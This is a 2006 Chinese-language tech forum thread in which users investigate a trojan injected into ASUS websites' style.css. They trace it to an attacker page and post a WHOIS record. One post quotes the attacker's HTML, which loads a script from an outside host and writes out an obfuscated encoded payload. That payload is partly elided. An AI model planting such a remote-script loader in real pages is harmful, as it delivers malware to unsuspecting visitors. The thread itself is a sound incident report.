PCDVD數位科技討論區

PCDVD數位科技討論區 (https://www.pcdvd.com.tw/index.php)
-   系統組件 (https://www.pcdvd.com.tw/forumdisplay.php?f=19)
-   -   ASUS網站被加料了? (https://www.pcdvd.com.tw/showthread.php?t=679020)

darksnow 2006-12-12 07:32 AM

昨天晚上看已經沒了,今天剛剛連上發現又出現了。

那個木馬網址藏身於此
http://tw.asus.com/include/style.css

jp和global的也有,木馬網址不一樣,但是內容一樣
http://jp.asus.com/include/style.css
http://www.asus.com/include/style.css

kyougi 2006-12-12 09:47 AM

不要用IE不就沒事了...

polyer1 2006-12-12 09:58 AM

引用:
作者darksnow
再補一個
C:\WINDOWS\system32\on1Exe.exe
也是Win32/PSW.Lineage.ACN trojan


看檔名....八成也是偷遊戲天堂帳號密碼的

se4joyce 2006-12-12 10:22 AM

用Maxthon 攔截到要安裝某物件的訊息 !
當然是選擇拒絕 !

se4joyce 2006-12-12 10:25 AM

現在ASUS 網站已經修復了
可以安心連結了 !

看來應該是ASUS 網站被入侵。

dillence 2006-12-13 01:47 AM

IE7玩玩就算了 ....

回頭支持 FF2.0

36多蒙卡修 2006-12-13 02:17 AM

引用:
作者se4joyce
現在ASUS 網站已經修復了
可以安心連結了 !

看來應該是ASUS 網站被入侵。


突然想到有沒有離職員工挾怨報復的可能性

sutl 2006-12-13 02:47 AM

引用:
作者36多蒙卡修
突然想到有沒有離職員工挾怨報復的可能性

通常這隻木馬都是中國駭客所為,目的在盜取天堂1/2遊戲帳號。

離職員工除非找到安全的銷贓管道,要不然很容易被抓。

FlyNews 2006-12-13 03:31 AM

上了ASUS網站,重新整理一下,
雖然不會連上 http://www.hiet.tw/1.htm
但還是可在IE狀況列看到出現一下


而這個 hiet.tw的網域, 在 http://rs.twnic.net/ 查是這個人的
但資料也不夠,也沒有電話,真是奇怪!


Domain Name: hiet.tw

Contact:
liting
[email protected]
Record expires on 2007-10-20 (YYYY-MM-DD)
Record created on 2006-10-20 (YYYY-MM-DD)
Registrar: SEEDNET

FlyNews 2006-12-13 03:38 AM

後來再到 http://www.hiet.tw/1.htm 看了一下,一個空白的網頁, 裡面有個java的連結

<SCRIPT LANGUAGE="JavaScript" src="http://www.plmq.com/script/src/code.js"></script><SCRIPT LANGUAGE="JavaScript"> var v = "原本是一大串編碼,省略jbElEMSAgPSAiY2xzaSINCiAgICBjbElEMiAgPSAi"; document.write(aa(v,100));</SCRIPT>


而這個就是那個Java了! http://www.plmq.com/script/src/code.js
可以用文字檔的方式打開看看裡面的程式是什麼。


所有的時間均為GMT +8。 現在的時間是11:57 PM.

vBulletin Version 3.0.1
powered_by_vbulletin 2025。